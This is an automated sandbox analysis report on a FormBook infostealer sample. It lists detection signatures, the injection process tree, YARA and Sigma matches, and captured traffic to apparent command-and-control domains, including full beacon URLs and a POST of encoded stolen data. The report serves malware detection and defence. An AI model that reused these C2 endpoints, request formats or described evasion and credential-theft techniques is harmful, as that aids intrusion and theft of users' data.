Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
arGdXDmyGJ.exe

Overview

General Information

Sample name:arGdXDmyGJ.exe
renamed because original name is a hash value
Original sample name:32139448518440440a55f5651ce646f6b4bee27828754bf37d879b65bf4db573.exe
Analysis ID:1634891
MD5:0813d6baff3338225b54a33627b15466
SHA1:5fd7af6257a820fa7141eb2743f35e92f23541a3
SHA256:32139448518440440a55f5651ce646f6b4bee27828754bf37d879b65bf4db573
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • arGdXDmyGJ.exe (PID: 6764 cmdline: "C:\Users\user\Desktop\arGdXDmyGJ.exe" MD5: 0813D6BAFF3338225B54A33627B15466)
    • svchost.exe (PID: 6908 cmdline: "C:\Users\user\Desktop\arGdXDmyGJ.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • DKwZ8oxmXrzaXEMk9aGP.exe (PID: 5424 cmdline: "C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\NErByGQbKw.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • takeown.exe (PID: 7200 cmdline: "C:\Windows\SysWOW64\takeown.exe" MD5: A9AB2877AE82A53F5A387B045BF326A4)
          • DKwZ8oxmXrzaXEMk9aGP.exe (PID: 5156 cmdline: "C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\FkNMtjPgZf.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 7396 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.3703535087.00000000032B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.1423385230.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000A.00000002.3701920023.0000000002F00000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000C.00000002.3703579679.0000000000E00000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.1424207705.0000000004C00000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\arGdXDmyGJ.exe", CommandLine: "C:\Users\user\Desktop\arGdXDmyGJ.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\arGdXDmyGJ.exe", ParentImage: C:\Users\user\Desktop\arGdXDmyGJ.exe, ParentProcessId: 6764, ParentProcessName: arGdXDmyGJ.exe, ProcessCommandLine: "C:\Users\user\Desktop\arGdXDmyGJ.exe", ProcessId: 6908, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\arGdXDmyGJ.exe", CommandLine: "C:\Users\user\Desktop\arGdXDmyGJ.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\arGdXDmyGJ.exe", ParentImage: C:\Users\user\Desktop\arGdXDmyGJ.exe, ParentProcessId: 6764, ParentProcessName: arGdXDmyGJ.exe, ProcessCommandLine: "C:\Users\user\Desktop\arGdXDmyGJ.exe", ProcessId: 6908, ProcessName: svchost.exe

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: arGdXDmyGJ.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://www.nan21.net/qgyh/Avira URL Cloud: Label: malware
                Source: http://www.multo.xyz/7pb3/Avira URL Cloud: Label: malware
                Source: http://www.multo.xyz/7pb3/?KXtX=iG3q5PwMXeyF6Z6OHOwnLDAB2x86IZiFZMnOHUGgWgCa6YvXG8DQKYCG1+TzSzVVi72rS31ZgGUBbEqi37d3liyshf+awvumd8QMl+tW3OgygeOmbI1Z2eSrbRuDAHzm0lVjKsQ=&bH_=FhMhihd8ULglqpUAvira URL Cloud: Label: malware
                Source: http://www.nan21.net/qgyh/?KXtX=N2HmuFTIqRTXb4KETJj8CE9599F//QagMURGDfaeIcB+VU8vulHmTvOSs8UDoR9HksVnHqxRO+DaBCTDBDB84DrGlrLbfAup4LskVHxAz2aVoJcIctBHkC743fNM4m+H2KSbQJE=&bH_=FhMhihd8ULglqpUAvira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: arGdXDmyGJ.exeVirustotal: Detection: 74%Perma Link
                Source: arGdXDmyGJ.exeReversingLabs: Detection: 68%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.3703535087.00000000032B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1423385230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3701920023.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3703579679.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1424207705.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3703646071.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1423688801.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3703690536.0000000004420000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: arGdXDmyGJ.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: takeown.pdbGCTL source: svchost.exe, 00000002.00000003.1392680906.0000000002A26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1391395201.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1392668149.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000002.3703008425.000000000135E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: arGdXDmyGJ.exe, 00000000.00000003.1232120246.0000000004200000.00000004.00001000.00020000.00000000.sdmp, arGdXDmyGJ.exe, 00000000.00000003.1233120508.0000000004060000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1423720111.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1423720111.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1330139854.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1328248098.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1423717679.000000000331F000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3703920004.0000000003680000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3703920004.000000000381E000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1426108573.00000000034CB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: takeown.pdb source: svchost.exe, 00000002.00000003.1392680906.0000000002A26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1391395201.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1392668149.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000002.3703008425.000000000135E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: arGdXDmyGJ.exe, 00000000.00000003.1232120246.0000000004200000.00000004.00001000.00020000.00000000.sdmp, arGdXDmyGJ.exe, 00000000.00000003.1233120508.0000000004060000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1423720111.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1423720111.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1330139854.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1328248098.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, takeown.exe, 0000000A.00000003.1423717679.000000000331F000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3703920004.0000000003680000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3703920004.000000000381E000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1426108573.00000000034CB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: takeown.exe, 0000000A.00000002.3702052200.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3704350785.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000002.3704031711.000000000264C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1736983581.0000000037F3C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: takeown.exe, 0000000A.00000002.3702052200.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3704350785.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000002.3704031711.000000000264C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1736983581.0000000037F3C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000002.3702330015.0000000000F3F000.00000002.00000001.01000000.00000005.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000000.1492047890.0000000000F3F000.00000002.00000001.01000000.00000005.sdmp
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FF445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00FF445A
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FFC6D1 FindFirstFileW,FindClose,0_2_00FFC6D1
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FFC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00FFC75C
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FFEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00FFEF95
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FFF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00FFF0F2
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FFF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00FFF3F3
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FF37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00FF37EF
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FF3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00FF3B12
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FFBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00FFBCBC
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F1C380 FindFirstFileW,FindNextFileW,FindClose,10_2_02F1C380
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 4x nop then xor eax, eax10_2_02F09DD0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 4x nop then mov ebx, 00000004h10_2_035104F8

                Networking

                barindex
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.sislieskort.xyz
                Source: DNS query: www.dolfisstillspinnin.xyz
                Source: DNS query: www.multo.xyz
                Source: Joe Sandbox ViewIP Address: 3.125.36.175 3.125.36.175
                Source: Joe Sandbox ViewIP Address: 3.125.36.175 3.125.36.175
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_010022EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_010022EE
                Source: global trafficHTTP traffic detected: GET /glm7/?KXtX=c3cNohkT5nIdW2eyEx8s7+0O2NNiR/tgpQEW4SezL5ftNCrKyIMnC5N2KYOJPpUbAjTm2X+3v3M3VE72mVE/plipaGNkddb2jL7OOh+v7t/x7/AnjOGKvUlOuL//r1u6EjU+kfE=&bH_=FhMhihd8ULglqpU HTTP/1.1Host: www.sislieskort.xyzAccept: */*Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qgyh/?KXtX=N2HmuFTIqRTXb4KETJj8CE9599F//QagMURGDfaeIcB+VU8vulHmTvOSs8UDoR9HksVnHqxRO+DaBCTDBDB84DrGlrLbfAup4LskVHxAz2aVoJcIctBHkC743fNM4m+H2KSbQJE=&bH_=FhMhihd8ULglqpU HTTP/1.1Host: www.nan21.netAccept: */*Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /a669/?KXtX=rwARXV5iz9NY7lD2nse3mpYvX8mI8lq4kwoE5vm7VO31wBaqesAJuHozl9YZ6Ede+IkifZaE/LHkIUXetab9rl00CglX2pKv9YN8iuRxzTdWq+TltZu1Ts2jDMPEAv0cwfEHjzs=&bH_=FhMhihd8ULglqpU HTTP/1.1Host: www.rbopisalive.cyouAccept: */*Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /z4h6/?KXtX=oPD5yFZP7wctr4H+UTXo8U1sQMLypPPPi/lke/3f4LEIiJw/NGa43dXYK61sC1fT5ul8W7mIEEjnBlsOqjdznuc7OkkqT82yW4fryMVKvxAGocvAG+dLnJThS/BrQn1Mm9ja8Ac=&bH_=FhMhihd8ULglqpU HTTP/1.1Host: www.dolfisstillspinnin.xyzAccept: */*Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /7pb3/?KXtX=iG3q5PwMXeyF6Z6OHOwnLDAB2x86IZiFZMnOHUGgWgCa6YvXG8DQKYCG1+TzSzVVi72rS31ZgGUBbEqi37d3liyshf+awvumd8QMl+tW3OgygeOmbI1Z2eSrbRuDAHzm0lVjKsQ=&bH_=FhMhihd8ULglqpU HTTP/1.1Host: www.multo.xyzAccept: */*Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6sso/?KXtX=5FYyPsJYL9mEwCZYVUnKPFrY8+hnQKVbJI6dHZrolSWgUyhhuZcUC37k5jyocUOOYHYjhpJnfRuNQT4n0jS+7Ytkj8ml9DFWF/GwfVm9hYeou/wyAin0yEy/IsOshtUp3mHulok=&bH_=FhMhihd8ULglqpU HTTP/1.1Host: www.zenilow.siteAccept: */*Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.sislieskort.xyz
                Source: global trafficDNS traffic detected: DNS query: www.nan21.net
                Source: global trafficDNS traffic detected: DNS query: www.rbopisalive.cyou
                Source: global trafficDNS traffic detected: DNS query: www.dolfisstillspinnin.xyz
                Source: global trafficDNS traffic detected: DNS query: www.multo.xyz
                Source: global trafficDNS traffic detected: DNS query: www.zenilow.site
                Source: global trafficDNS traffic detected: DNS query: www.kakeksakti43.cfd
                Source: unknownHTTP traffic detected: POST /qgyh/ HTTP/1.1Host: www.nan21.netAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brOrigin: http://www.nan21.netCache-Control: max-age=0Content-Length: 209Content-Type: application/x-www-form-urlencodedConnection: closeReferer: http://www.nan21.net/qgyh/User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36Data Raw: 4b 58 74 58 3d 41 30 76 47 74 77 2f 57 6b 57 37 4f 58 74 79 38 63 62 2f 47 61 56 51 6a 6a 63 35 54 6f 69 43 49 4a 77 63 7a 44 4e 4c 6c 49 62 4e 4b 66 41 49 4c 68 6b 4c 30 43 76 65 54 68 74 5a 71 6f 43 56 65 74 4f 39 4f 54 5a 59 49 66 61 4b 78 56 54 2f 53 54 68 64 49 75 47 44 33 72 64 37 49 42 54 66 50 77 62 6f 52 42 58 4d 50 2f 58 4b 31 71 36 70 51 5a 59 4d 72 6d 79 33 6c 34 39 74 38 32 32 6d 45 75 5a 43 57 61 4a 77 65 6a 59 43 45 2b 63 59 46 52 4d 72 59 4b 68 52 52 78 39 47 7a 6a 50 59 63 44 64 38 61 58 36 55 67 61 46 39 71 4a 5a 4d 73 46 43 61 79 6d 71 6b 4a 42 74 38 4f 2f 47 69 37 71 51 63 46 61 70 51 74 74 59 43 32 Data Ascii: KXtX=A0vGtw/WkW7OXty8cb/GaVQjjc5ToiCIJwczDNLlIbNKfAILhkL0CveThtZqoCVetO9OTZYIfaKxVT/SThdIuGD3rd7IBTfPwboRBXMP/XK1q6pQZYMrmy3l49t822mEuZCWaJwejYCE+cYFRMrYKhRRx9GzjPYcDd8aX6UgaF9qJZMsFCaymqkJBt8O/Gi7qQcFapQttYC2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, max-age=0Content-Type: text/plain; charset=utf-8Date: Tue, 11 Mar 2025 05:26:29 GMTServer: NetlifyX-Nf-Request-Id: 01JP1TPC2KSMXE7KTKTBSD4FWEContent-Length: 50Connection: closeData Raw: 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 52 65 71 75 65 73 74 20 49 44 3a 20 30 31 4a 50 31 54 50 43 32 4b 53 4d 58 45 37 4b 54 4b 54 42 53 44 34 46 57 45 Data Ascii: Not Found - Request ID: 01JP1TPC2KSMXE7KTKTBSD4FWE
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, max-age=0Content-Type: text/plain; charset=utf-8Date: Tue, 11 Mar 2025 05:26:31 GMTServer: NetlifyX-Nf-Request-Id: 01JP1TPEJNVH1538N2RMFXBXSKContent-Length: 50Connection: closeData Raw: 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 52 65 71 75 65 73 74 20 49 44 3a 20 30 31 4a 50 31 54 50 45 4a 4e 56 48 31 35 33 38 4e 32 52 4d 46 58 42 58 53 4b Data Ascii: Not Found - Request ID: 01JP1TPEJNVH1538N2RMFXBXSK
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, max-age=0Content-Type: text/plain; charset=utf-8Date: Tue, 11 Mar 2025 05:26:34 GMTServer: NetlifyX-Nf-Request-Id: 01JP1TPH30J49YN8QAH0V0GA6TContent-Length: 50Connection: closeData Raw: 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 52 65 71 75 65 73 74 20 49 44 3a 20 30 31 4a 50 31 54 50 48 33 30 4a 34 39 59 4e 38 51 41 48 30 56 30 47 41 36 54 Data Ascii: Not Found - Request ID: 01JP1TPH30J49YN8QAH0V0GA6T
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, max-age=0Content-Type: text/plain; charset=utf-8Date: Tue, 11 Mar 2025 05:26:37 GMTServer: NetlifyX-Nf-Request-Id: 01JP1TPKPTCD502WP8B10MT45EContent-Length: 50Connection: closeData Raw: 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 52 65 71 75 65 73 74 20 49 44 3a 20 30 31 4a 50 31 54 50 4b 50 54 43 44 35 30 32 57 50 38 42 31 30 4d 54 34 35 45 Data Ascii: Not Found - Request ID: 01JP1TPKPTCD502WP8B10MT45E
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 05:26:55 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
